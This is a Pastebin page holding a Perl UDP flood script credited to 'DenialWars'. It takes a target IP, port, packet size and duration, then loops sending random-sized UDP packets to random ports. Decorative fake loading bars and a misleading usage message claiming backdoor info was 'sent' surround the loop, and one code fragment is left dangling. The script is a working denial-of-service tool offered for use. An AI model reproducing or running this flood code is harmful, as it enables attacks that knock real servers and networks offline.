Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl
- use Socket;
- use strict;
- use Term::ANSIColor;
- my ($ip,$port,$size,$time) = @ARGV;
- my ($iaddr,$endtime,$psize,$pport);
- $iaddr = inet_aton("$ip") or die "Usage:Your Server Just Got Backdoor Info Successful Sented To SmallShoes\n";
- $endtime = time() + ($time ? $time : 10000);
- socket(flood, PF_INET, SOCK_DGRAM, 17);
- print "\e[37m Loading…\n\e[0m";
- print "\e[31m █▒▒▒▒▒▒▒▒▒\n\e[0m";
- print "\e[37m 10%.\n\e[0m";
- print "\e[33m ███▒▒▒▒▒▒▒\n\e[0m";
- print "\e[37m 30%..\n\e[0m";
- print "\e[32m █████▒▒▒▒▒\n\e[0m";
- print "\e[37m 50%...\n\e[0m";
- print "\e[34m ███████▒▒▒\n\e[0m";
- print "\e[37m 100%....\n\e[0m";
- print "\e[35m ██████████\n\e[0m";
- print "\e[37m Loading Packets\n\e[0m";
- print "\e[37m Loaded 1000+ Packets\n\e[0m";
- print "\e[37m Sented Packets To $ip\n\e[0m";
- print "\e[37m Script Made By DenialWars\n\e[0m";
- ($size ? "$size-byte" : "sent") . " " .
- ($time ? "for $time seconds" : "") . "\n";
- for (;time() <= $endtime;) {
- $psize = $size ? $size : int(rand(1024-64)+64) ;
- $pport = $port ? $port : int(rand(65500))+1;
- send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport,
- $iaddr));}for (;time() <= $endtime;) {
- $psize = $size ? $size : int(rand(1024-64)+64) ;
- $pport = $port ? $port : int(rand(65500))+1;
- send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport,
- $iaddr));}
Advertisement
Add Comment
Please, Sign In to add comment